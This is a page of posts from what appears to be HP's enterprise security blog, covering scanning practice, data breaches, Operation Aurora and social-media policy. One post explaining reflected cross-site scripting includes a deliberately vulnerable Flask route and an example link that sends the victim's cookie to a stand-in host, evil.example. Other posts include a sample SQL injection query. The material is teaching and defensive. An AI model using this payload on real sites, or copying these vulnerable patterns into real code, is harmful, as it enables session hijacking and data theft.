HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and perform a host of other malicious intents. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms—unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Active Defense – Not just passive protection...

What does it mean to defend your network as opposed to just protecting it? In this post, I continue thinking out loud about defensive information security doctrine. I will look at an active and mobile defense of your enterprise.

Tags: Defense | HP | security

HP introduces update to ArcSight Threat Detector 2.0 and Threat Response Manager 5.5

HP today announced updates to its Big Data Security Analytics through HP ArcSight portfolio to enhance early detection and accelerate threat response and prevention.

 

According to a recent report on advanced targeted attacks released by Mandiant, attackers spend an estimated 243 days on a victim’s network before they are discovered.  In addition, nearly two-thirds of organizations learn that they have been breached from an external source, such as a customer or law enforcement.

 

HP updates 'HP ArcSight' portfolio to enhance big data security analytics

HP today announced updates to its HP ArcSight portfolio, offering enterprises unified security analytics for big data with expanded identity monitoring to accelerate the detection of persistent threats.

 

Enterprises must proactively anticipate intrusions and hasten the detection of risks in order to protect valuable assets. To successfully identify and remediate occurrences of prolonged unauthorized network access, also known as advanced persistent threats (APTs), organizations must be prepared to:

 

  • Handle and process information at high velocity, volume and variety
  • Analyze structured and unstructured data both inside and outside their network
  • Monitor events in cloud, mobile and virtual environments
  • Automatically take action once a threat has been detected

 

Web Application Testing: Vulnerability Assessment vs. Penetration Test


Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test" debate, and it's no different in the web application security space. Sadly, the discussion isn't usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean. Step 1: agree on terms.

So, I'll be ambitious and tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue.

Web Vulnerability Assessment vs. Web Penetration Test

 

It's worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we'd simply have one term that we'd qualify with "with or without exploitation".

 

A web application vulnerability assessment is fundamentally different from a penetration test because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test's focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is achieved--not when a massive list of vulnerabilities is produced. That's what a vulnerability assessment is for.

 


 

Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based. That's its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal. It's an implicit goal of getting as far as you can given whatever constraints are in place.

 

The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there's exploitation it's a penetration test and if not it's a vulnerability assessment." Again, the key difference here is list-based vs. goal-based--not exploitation. It's possible to do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not actually do it. Exploitation is an independent attribute that can be attached to either type of test.

 

When to Use One vs. the Other

 

Now that we see a distinction between terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because a vulnerability assessment (getting a list of everything that needs fixing) is usually where most customers are in terms of maturity.

 

To tightly summarize: a vulnerability assessment is list-based and aims for breadth (find as many issues as possible), while a penetration test is goal-based and aims for depth (achieve a specific objective). Exploitation can be included in or excluded from either.

 

For questions or comments I can be reached at daniel.miessler@hp.com and on Twitter at @danielmiessler.

Cookie Stealing With Cross-Site Scripting Explained


 

One of the most common questions I receive when doing appsec consulting revolves around cross-site scripting. Specifically, I am asked constantly why it is that stealing a cookie via reflected cross-site scripting has so many steps. If the goal is to get a victim to run a malicious script that steals cookies, and the attacker has to send the victim a link anyway...why not just send them a link to a script and be done with it? Why waste time with all this reflection?

 

It's a good question, and the answer eludes many bright and experienced security professionals--including some who have had weeks of application security training. What I'll do here is lay out a quick set of conceptual steps that should make the mechanics of this attack completely transparent.

 

  1. Cookies Are Authentication. This is key to remember. Cookies are given to you by a server after you've proven that you are who you say you are. This is why you don't have to enter your password repeatedly when you load each page. So if someone gets that cookie you're using, they can become you. Naturally, if someone gets your cookie from bank.com or store.com, that's a problem.
  2. Evil.com Cannot Access the Cookies From Bank.com. This is part two of the equation. If a script running off of evil.com could pull the cookies from bank.com or store.com, then attackers could just send a cookie stealing script that runs on evil.com and get the cookies from every other site the victim has been to. 

    That is prevented by the same-origin policy, which dictates that a script can only access cookies from the domain it is served from. So if you click a link that points to evil.com and steals cookies, it can only steal the cookie given to you by evil.com--which is not likely to be very useful to the attacker. Remember, it's the bank.com cookie that is the target of the attack.
  3. So We Must Get the User to Run a Script Served by Bank.com. This is the key to the whole thing: In order to steal a target user's cookie from bank.com, an attacker has to get that user to run a script served by bank.com that steals their cookie. So how do we do that? That's where the cross-site scripting comes in.
  4. Reflected Cross-site Scripting Allows User-submitted Content to Bounce Back to the Browser. This is the part that more people understand: You submit script in a request to a server, and because it's not properly handled it gets sent back to the client in the response--at which point the browser runs it. So the attacker simply finds an area on bank.com that is vulnerable to this problem, and he builds his link to point there as the container for his cookie-stealing script.
  5. The User Bounces the Cookie-stealing Script off of Bank.com. This is the final step that usually gets glossed over in explanations. The user clicks the link that the attacker sent him, which points to bank.com (it must be safe if it's bank.com, right?), and then the cookie-stealing script comes back in the browser and steals the cookie for the current user, i.e. the victim.

The key here is that if the script didn't come from bank.com it wouldn't have been able to steal the user's cookie for bank.com, and that's the only purpose for the cross-site scripting--to get malicious script to "come from" a known good website. That's why the extra step is there: you can only access the cookie of a site you're visiting.
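
To make those steps concrete, here is a minimal sketch of the vulnerable reflection, written as a small Flask application. The /search route, the "q" parameter, the cookie value and the evil.example collection URL are all hypothetical placeholders rather than anything from a real site; the point is only to show why the payload has to bounce off the trusted domain.

    # Minimal sketch of a page vulnerable to reflected XSS (Flask assumed;
    # the route, parameter and cookie values are hypothetical placeholders).
    from flask import Flask, request, make_response

    app = Flask(__name__)

    @app.route("/search")
    def search():
        # VULNERABLE: the "q" parameter is echoed into the page without
        # output encoding, so any script an attacker puts in the link
        # runs in the victim's browser under this site's origin.
        q = request.args.get("q", "")
        resp = make_response(f"<html><body>Results for: {q}</body></html>")
        resp.set_cookie("session", "victim-session-token")
        return resp

    # The attacker's link points at the trusted site itself, for example:
    #   https://bank.example/search?q=<script>new Image().src=
    #     "https://evil.example/c?"+document.cookie;</script>
    # Because the script is reflected by bank.example, the same-origin policy
    # lets it read bank.example's cookie and ship it off to evil.example.

    if __name__ == "__main__":
        app.run(port=5000)

Served from any other origin, the same script would only see that origin's cookies, which is exactly the point of steps 2 and 3 above.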

 

At any rate, I hope this helps someone, and in a future post I'll be creating and posting some proof-of-concept content to help illustrate how it works in practice.

Tags: XSS

China, Google and Web Security

Google recently announced that its China-based location was the victim of an attack that targeted and compromised a critical internal system used to track the email accounts of those on China’s watch list. The system was designed to comply with government warrants for information concerning Chinese human rights activists. Some suspect China of targeting this specific system to circumvent the official warrant process in order to collect data on other Chinese citizens.

 

 

More alarmingly, this attack was not exclusively directed at Google. In all, at least 34 companies including Yahoo, Symantec, Northrop Grumman, Dow Chemical, Washington-based think tanks, and assorted human rights advocacy groups were compromised by the spear phishing attack.

 

At first rumored to be another Adobe flaw, the attack (code-named “Aurora”) was revealed on closer examination by McAfee Labs to be a sophisticated zero-day exploit against Microsoft’s Internet Explorer.

 

What should be most worrisome is not the zero-day in all versions of IE, but the new crop of “advanced persistent threats” that are siphoning money and intellectual property. These APTs are professionally organized, have extensive funding and employ smart people. The result: triple-encrypted shellcode that downloads multiple encrypted binaries, which drop an encrypted payload on the target machine, which in turn establishes an SSL channel to a command-and-control network. This is serious stuff.

 

Only a few years ago the majority of web-based attacks seemed to be launched by individuals or small groups to collect credit card information. These attacks had serious consequences, but the magnitude of the losses and the organization of the black market economy were still child’s play by today’s standards.

 

Current threats from the Eastern bloc are directed at massive monetary gain - probably in the area of tens of millions of dollars. China appears hell-bent on stealing state secrets and intellectual property from governments and private business alike. The stakes are much higher, and the bad guys are much more capable of pulling off the heist.

 


 

We have known for a long time that phishing scams have been very effective at exploiting random samples of unsuspecting users. However, the focused targeting of private business is a newer, more sophisticated and lucrative threat. These spear phishing attacks are intensely researched and aimed at top-level executives, and will become more common as time passes.

 

In a directly related point, consider the curious appearance of a new website called iiScan. This service offers to scan your web application for vulnerabilities - for FREE. Just sign up and point their software to your website, and they will ‘figure out’ how vulnerable to an attack you might be. After the scan is done, they will email you a PDF report.

 

Placing trust in such services has been discussed before, especially concerning cloud security. It doesn’t take much to imagine all the things that could go wrong in this scenario, even if IE didn’t have multiple zero-day exploits, and a proof-of-concept malicious embedded PDF exploit had not just been released.

 

NOSEC Technologies Co., Ltd. (the company behind iiScan) may very well be legitimate, or at least may have started out that way. Even if they are not actively attacking websites, it shouldn’t take long for them to become a high-profile target for either private hackers or the Chinese government itself. What would be a better target than a database full of public websites and their known vulnerabilities? These sites, if not already compromised by iiScan, could be used as command-and-control drones, payload hosts, pieces of a distributed file-system, or merely SPAM relay channels.

 

Education and Armament

 

Every day adds more proof that web application threats are being crafted by motivated, professional organizations with deep pockets. Security needs to be taken very seriously and practiced diligently, and all users need to be paranoid when surfing the web. This is especially important because the media is reluctant to report all the gory details of the real impact of cybercrime.

 

Installing preventative software is a good idea, too. Some of the latest tools and devices may help to prevent drive-by malware, spear phishing payloads, etc. Install Firefox and use plug-ins that flag suspected malware host sites. Use a personal web proxy, and restrict evil IPs. You can get the most comprehensive list of Korean and Chinese blocks (including iptables, htaccess files, dns zones, etc) from this page. Above all, stop clicking on those emails from your least technical friends that include an attached PowerPoint or PDF file to deliver a punch line. The villains take the Internet very seriously, and so should you.
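
As a rough sketch of the 'restrict evil IPs' advice, the snippet below turns a plain-text list of CIDR blocks into iptables DROP rules. The blocklist file name and the use of the INPUT chain are assumptions for illustration; adapt them to whatever list and firewall layout you actually run.

    # Sketch: convert a plain-text CIDR blocklist into iptables DROP rules.
    # The file name and the INPUT chain are assumptions for illustration.
    import ipaddress

    def rules_from_blocklist(path):
        rules = []
        with open(path) as handle:
            for line in handle:
                entry = line.strip()
                if not entry or entry.startswith("#"):
                    continue  # skip blank lines and comments
                # Validate each entry before emitting a rule for it.
                network = ipaddress.ip_network(entry, strict=False)
                rules.append(f"iptables -A INPUT -s {network} -j DROP")
        return rules

    if __name__ == "__main__":
        for rule in rules_from_blocklist("blocklist.txt"):
            print(rule)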

 


UPDATE (1/19/2010):

 

Thanks to the Full-disclosure list (Marc, Smasher, Dan) for pointing out that the exploit was not nearly as sophisticated as McAfee has led us to believe.

 

The exaggerated sophistication of the attack reinforces my point about media FUD - ironic in its own way, because the media is quick to exaggerate the sophistication of the attacks yet minimizes the damage associated with them. It’s like getting up off the floor after a sucker punch and taunting "That didn't hurt". The reality is that simple attacks are still very effective - our security education and implementation still have a long way to go.

 

However, the real point of this article was to encourage a little more critical thinking surrounding software security. Putting blind faith in any type of security device (airport scanners, webapp scanners, etc.) is not good security practice.

 

 

 

 

 

 

WebInspect Tips: Changing settings to improve scans

Although running WebInspect with ‘out of the box’ scan settings might be the easiest way to start a scan, it is almost sure to produce unexpected results. Configuring any web application scanner is tricky, but following these simple steps to fine-tune the scan will produce more accurate results.

 

Know your website

 

Performing a manual assessment of your website (before using any tools) will help you quickly spot mis-configured scans, tweak scan configuration parameters, and ensure more consistent results.

 

The first step is to become familiar with the site topology - directory structure, the number of pages, submission forms, etc. Perform a manual site survey and take notes. If you have access to the source, look at the file structure. If not, hover over the menu links and notice the site structure of the URLs. Are URL parameters used to drive the site navigation? If so, record them and use them to drive WebInspect.

 

It is also important to have some understanding of how the site operates behind the scenes. Different websites tend to handle common administrative tasks in unique and unexpected ways. For example, some websites require users to re-enter their passwords and pass a ‘captcha’ test before assigning a new password. Other sites allow a password to be changed simply by entering a new password.

 

Knowing the basics of the site mechanics will go a long way toward heading off mis-configured scans, and getting familiar with the layout of your site is the best way to help WebInspect cover the entire site.

 

Protect your data

 

Web application security tools try to force websites to accept input data that they may not have been designed to handle. Therefore one side effect of auditing a website for vulnerabilities is that ‘garbage data’ can be injected into the database. On a database-driven site (like most blogs or CMS systems), this junk data will show up in other unexpected and very visible ways. After a scan, you may find that your default website language has been changed to Farsi, test files have been uploaded, the new blog color theme has been set to ‘Early 80s Disco’, or 13 new users have been added – complete with nonsense test Posts.

 

To minimize these risks, scan a non-production version of the target website if possible. Sometimes audits are necessary on a complicated production server setup. If this is the case, make a backup of the entire production database and verify the ability to successfully restore it before a scan.
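
If a production scan truly cannot be avoided, scripting the backup-and-verify step keeps it from being skipped under time pressure. Here is a minimal sketch, assuming a MySQL-backed site with the standard mysqldump and mysql client tools installed and client credentials already configured; the database names are placeholders.

    # Sketch: dump the production database, then prove the dump restores
    # cleanly into a scratch schema before the scan starts. Assumes MySQL
    # client tools on the PATH and configured credentials; database names
    # are placeholders.
    import subprocess

    DUMP_FILE = "pre_scan_backup.sql"

    def backup(database):
        with open(DUMP_FILE, "w") as out:
            subprocess.run(["mysqldump", database], stdout=out, check=True)

    def verify_restore(scratch_database):
        # Restoring into a throwaway schema is the only real proof that the
        # backup is usable if the scan mangles production data.
        with open(DUMP_FILE) as dump:
            subprocess.run(["mysql", scratch_database], stdin=dump, check=True)

    if __name__ == "__main__":
        backup("production_site")
        verify_restore("scan_restore_test")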

 

Limit the scan

 

If the local server hosts multiple web applications, it is important to restrict the audit to the application of interest. For example, my local Apache installation hosts 12 web applications in the htdocs root folder. When I want to scan “Wordpress”, I often forget to restrict the audit, and end up with a noticeably longer scan time and an unusually large number of vulnerabilities. A glance at the “site” tree in WebInspect will quickly show whether the scan has started crawling into folders that were not intended.

 

To prevent the scan from ‘running away’ (taking too long to complete), open the scan settings before the scan is launched, check the “Restrict to folder” option and select “Directory and subdirectories”. Take note: this option is not enabled by default, so this may be worth remembering. Also, make sure the start URL either contains a start page, or the initial directory ends with a trailing “slash”.

 

Login Macros

 

Login Macros are essential to correctly scanning a website, yet may unknowingly be the root of many failed scans. Before creating a new login macro to allow WebInspect to successfully gain entry to the actual site, choose a user with limited ability to modify the site. If one is not available, create a new user with the lowest role possible. For example, Wordpress allows 4 roles with varying degrees of ‘power’: Administrator, Editor, Author and Contributor. Scanning Wordpress as the Administrator user may result in any of several undesirable scenarios, including the destruction of the entire blog, while scanning as a ‘Contributor’ should only result in a few extra unpublished blog entries.

 

Check your login macros for errors during the scan. A login macro that is incorrectly recorded may fail to log in to the site, which causes the scan to produce invalid results. Symptoms include abnormally short scan times, a lack of vulnerabilities, or large numbers of errors in the error log.

 

Other times the macro may not be able to log back into the website during a scan – even after the first login has been successful. For example, if the login macro is tied to a user account that is able to change its own password, the audit may change that password and prevent the macro from logging back into the site. Once this happens, the error log may fill up with errors and the scan may stop. It is important to monitor the scan periodically and assess its ‘health’.

 

Conclusion

 

Some users might be unaware of the unintended consequences of web application vulnerability scanning, while other users might need help understanding their scan process. Although these simple steps will not solve every issue with scanning complex sites, they will help rudimentary scans produce more valuable results. The more information that is provided to WebInspect through the scan configuration settings, the better the outcome of the scan will be.

85% of IT security decision makers think successful external attacks very unlikely

A new report this week from ITC reveals that eighty-five percent of IT security decision makers think that losing data via an external threat is "very unlikely." Wow. Once upon a time, anyone involved in application security needed to educate potential customers on why application security was important. You remember. It's not the network layer anymore...the application layer is where the attacks are occurring. That hasn't changed. It's one thing to think that your internal threats are greater than your external threats. What with 'curious' employees and such, that's understandable. But it's something else entirely to think that external threats simply aren't relevant. I'm sure the company that rhymes with smartland payment blisstyms thought so, too.

 

http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=220301560

 

Why we can’t count (data loss)

Numbers lie


Recently California made headlines after more than 800 data breach disclosures were filed in the first five months of 2009. Upon closer inspection, the large number of incidents does not represent a rise in actual incidents, but just a change in mandated reporting practices due to California’s new medical data breach law, which went into effect on January 1, 2009.


Unfortunately, in practice we have no idea how much private information is lost to data breaches every year, because disclosure laws do not entice businesses to accurately report data breach incidents. While the number of reported incidents appears to be growing, it is a poor reflection of reality, owing in large part to changes in compliance laws. Although we are getting a better estimate of the number of “reported” incidents, the number of “actual” incidents is still unknown.


Data breaches will not decrease


While it seems fairly compelling to believe that increased legislation and financial penalty would motivate all sectors of industry to beef up data security, pragmatism dictates otherwise.


Digital data is like uranium: dense with a high yield. Almost all data breaches are of digital records. In contrast, old-fashioned paper records are fairly secure.  Stealing several thousand paper records is physically risky and combing through them for valuable information is prohibitively time consuming.


Computers make breaches easier and more attractive. Roughly 50% of all incidents are of the non-accidental, malicious variety, such as malware, hacking, and laptop theft. These incidents yield 83% of the total number of stolen records reported. A large amount of valuable personal information available for minimal risk is a very attractive value proposition… so attractive that it presents new and increased incentive where none existed before. Of reported financial data breach incidents, 24% are caused by insiders, such as executives, IT administrators and employees, and 55% are attributed to outside hacking.


Lack of Incentive


Although data breaches are expensive (on average costing $6.6 million per incident), companies are very slow to take preventative action. Despite compliance laws, many companies still lack sufficient pragmatic (read ‘monetary’) incentive to change their security practices. The guidelines currently in place suffer from a number of issues:


Laws are vague: Compliance laws vary from state to state, and often include exemption from disclosure requirements if the stolen private data is “encrypted” – even if the encryption keys are stolen, too. Any data that is publicly available from federal, state, or local government sources is also exempt.


Companies can plead ignorance: In 24% of reported data breaches, the company does not know or does not specify how much information was compromised. To avoid negative media attention, many victims of large data breaches simply claim “zero” in the “number of records stolen” column.


Notification timelines are usually vague: Loose wording such as “the most expedient time possible” and “without unreasonable delay” serves to allow companies to choose when they disclose their data incidents (except companies in Florida and Ohio).


Most incidents are unreported: According to a survey conducted at the RSA conference in 2007, a full 89% of companies that experienced a data breach did not publicly disclose the incident. Assuming that incident disclosure is still largely a voluntary exercise without oversight, we have no reason to suspect that it has changed much for 2008 or 2009.


Summary: 


The interest in personal data is not a fad, and related data breaches will not magically disappear. While private data is lost from many sources, web applications figure prominently in the security equation.


Changes in policy will highlight the enormous number of incidents, and attitudes will have to change from a reactionary “defense” to a proactive security “offense”.


Preventative security medicine is the best and most cost-effective policy. For the IT manager, the decision to spend several thousand dollars on current security tools should be an easy one to make. The cost of preventative security pales in comparison to the cost of cleaning up the mess after getting breached.

Jump Start Application Security Initiatives with SaaS

HP Application Security's own Caleb Sima, Chenxi Wang of Forrester Research, and Vinnie Liu of Stach and Liu give a great presentation about why corporations with seemingly insurmountable application security issues would do well to implement a SaaS solution. Tight timelines, limited budgets, and a lack of security experts? Compliance deadlines and hundreds of applications to secure? Learn how companies can leverage SaaS to meet these challenges.

  

Register for the presentation at:

  

http://www.csoonline.com/webcast/494866/?source=csocib_071309

Uncharted Territories: the personal-corporate-social-web-mashup

Corporate web communications have grown from simple web pages to massive and complex applications. The security department has mostly kept up and maintained a secure perimeter—even when that perimeter included outsourced and vendor systems. Contracts were in place, systems were secured, and life was good—even when the executives had their own blogs.

  

But just when everyone was getting comfortable again--enter the social web: MySpace, Twitter, and Facebook. People started using them and corporations followed.  Born of this are the corporate MySpace pages, Facebook groups, Facebook fan pages, management’s Twitter accounts, LinkedIn recruiting pages and more…

  

Did you see what happened there? No? It’s okay, neither did the security department.

  

So what was it? The customer contact point shifted from the corporate web environment to one controlled by a third-party.

  

Unlike most arrangements made with third-party vendors, this relationship is likely not covered by any type of contract, agreement or partnership. There is no guarantee for reliability, privacy, security or any type of regulatory controls. Your corporate users/administrators, as well as your customers, are bound by the third-party’s terms of service and policies, not yours, and you are also at their whim with regard to functionality and design.

  

These are no small issues when you consider the spider-web of laws, regulations and agencies that may cover many large businesses: Sarbanes-Oxley, HIPAA, GLB, etc. The security team, human resources and PR/brand all have a vested interest in keeping your sites and customer information secured, protected and private, and they just lost control of a key piece of the infrastructure.

  

This is not a completely theoretical risk. Looking at the news for the past few years, it’s easy to come up with examples that could have business, customer or employee impact. Even if no laws were violated or charges filed, in the internet age a negative story can spread like wildfire and damage brand.

  

Here are a few quick examples:

 

These are simply a few recent examples, but represent the tip of the iceberg. It’s hard to find news stories of confidential or proprietary corporate information posted to these sites, but you can safely bet it happens.

  

As marketing and PR types take a bigger interest in these channels to reach additional markets, and more and more users flock to these sites, the corporate presence there is going to increase drastically.

  

So what should a company do? With regard to employees, here are a few suggestions:

 

  • Remind employees it is their responsibility to safeguard corporate and customer information.
  • Incorporate messages about social networking into existing employee training and policies, and if applicable, give employees refresher courses.
  • Ensure employees realize the internet isn’t actually anonymous, and that they should behave ethically and in a manner that doesn’t reflect poorly on themselves or the company.

   

If the company is creating an official presence on third-party web sites, some additional suggestions come to mind:

 

  • Determine the proper ownership for these channels—perhaps marketing or public relations—and establish a centralized point of contact.
  • Implement policies, guidelines and/or a code of ethics which clearly determine what information can and cannot be posted, and have a review procedure for anything questionable.
  • Implement policies/procedures for managing accounts and passwords to third-party systems, which include controls for changing passwords after employee attrition, choosing strong passwords, etc.
  • Implement procedures for monitoring the sites on a regular basis to ensure the messages, conversations and the brand “image” are appropriate (this can be contracted to other parties).
  • With the legal department, review the terms and conditions of the web site to look for potential pitfalls with regard to marketing through the site as well as ownership of uploaded content.
  • Thoroughly investigate privacy and security settings on the web site, and determine which should be enabled to best protect the company, customers and the user accounts.
  • If any relationship becomes mission critical or an important piece of the business, pursue contracts with the site operators which attempt to establish things like official support, uptime guarantees, additional security features, etc.   

These may all seem like daunting tasks, but any company with even a partially mature security department and policies should be able to integrate these types of changes fairly easily—in almost every case these are simply extensions, additions or clarifications to things already present in the corporate culture.

  

Given the immense popularity of these sites and their growth rates, the problem isn’t going away any time soon. Before the next wave of change comes to the internet, social networking policies and changes should be dealt with in a way that respects what employees do in their off-hours, protects the company and provides a new opportunity for corporate growth. The company that sticks its head in the sand may find itself in a nasty situation that could have been easily avoided with a little forethought.

Hacking has evolved

This is a great article about the value of a hacked PC to an attacker. While this focuses on personal PCs, all of these reasons can also apply to compromised web servers. Remember, web hacking has evolved. Script kiddies began by defacing web sites and conducting other forms of cyber vandalism. As applications grew in complexity, so did the attacks. Suddenly, it was all about the data as hackers learned how to extract the data contained in applications via SQL Injection and other methods. Now, though, the attacks are designed to compromise a web server and use it as a platform to spread malware (or worse) and conduct other crime. And as the threats grow, so does the need to integrate security throughout the application lifecycle.    

 http://voices.washingtonpost.com/securityfix/2009/05/the_scrap_value_of_a_hacked_pc.html?wprss=securityfix
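
To illustrate the SQL injection step in that evolution, here is a minimal sketch of the difference between a query built by string concatenation and a parameterized one. It uses Python's built-in sqlite3 module, and the table and column names are made up purely for the demonstration.

    # Sketch: why string-built SQL leaks data while parameterized SQL does not.
    # Uses an in-memory sqlite3 database; table and column names are made up.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    attacker_input = "nobody' OR '1'='1"

    # VULNERABLE: the input becomes part of the SQL text, so the OR clause
    # turns the query into "return every row" and dumps the whole table.
    leaked = conn.execute(
        f"SELECT name, password FROM users WHERE name = '{attacker_input}'"
    ).fetchall()
    print("concatenated query returned:", leaked)

    # SAFE: the input is bound as data, so it can never change the query logic.
    safe = conn.execute(
        "SELECT name, password FROM users WHERE name = ?", (attacker_input,)
    ).fetchall()
    print("parameterized query returned:", safe)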

Instant High Score!

One of our security researchers just happened to stumble across this interesting Highscores area of a free Flash skeet shooting game. Notice scores 6-10. Now I'm not saying he had anything to do with this. What I am saying is that if your query parameters can be manipulated, some hacker will mess up your application just to see if he can. And if that part of the site is insecure, what else is?
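
For anyone wondering what 'manipulated query parameters' looks like in practice, here is a minimal sketch of the kind of score-submission handler that invites exactly this. The endpoint, parameter names and score limit are invented for the example; the takeaway is that anything the client sends must be validated on the server.

    # Sketch: a naive score endpoint trusts whatever the client sends, so a
    # crafted request like /submit_score?player=hacker&score=999999999 tops
    # the leaderboard instantly. Endpoint and parameter names are invented.
    from flask import Flask, request, abort

    app = Flask(__name__)
    MAX_PLAUSIBLE_SCORE = 500  # whatever the game can legitimately produce
    scores = {}

    @app.route("/submit_score")
    def submit_score():
        player = request.args.get("player", "")
        try:
            score = int(request.args.get("score", "0"))
        except ValueError:
            abort(400)
        # Server-side sanity check: reject values the game could never produce.
        if not player or score < 0 or score > MAX_PLAUSIBLE_SCORE:
            abort(400)
        scores[player] = max(score, scores.get(player, 0))
        return "ok"

    if __name__ == "__main__":
        app.run(port=5000)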

 

 

 

 

 

 

 

Even in recession, web application security spending to increase

A recent OWASP survey found that over a quarter of IT organizations plan to spend more money specifically for web application security.  Another 36% expect web application security spending to remain at current levels. Considering the state of the economy, those are good numbers. Even with recessionary belt-tightening and across the board budget reductions, web application security isn't being ignored because more enterprises understand it simply can't be ignored. Granted, this survey was conducted on a site devoted to web application security, so the responders are much more likely to care than 'other' IT professionals. But, if anybody should know that security spending is going up or at least staying the same, it's them. Let's call that a push.

There are some other good nuggets within the survey. This is the best selling point I've heard for web application security in quite some time: "Organizations that have suffered a public data breach spend more on security in the development process than those that have not." We'll call that the 'barn door axiom'. If you've been breached, the pain ensures you do what you can to mitigate the risk of another incident. And the best way to do that is building security into the development process, not brushing it on after the product has been released.

http://www.owasp.org/images/b/b2/OWASP_SSB_Project_Report_March_2009.pdf
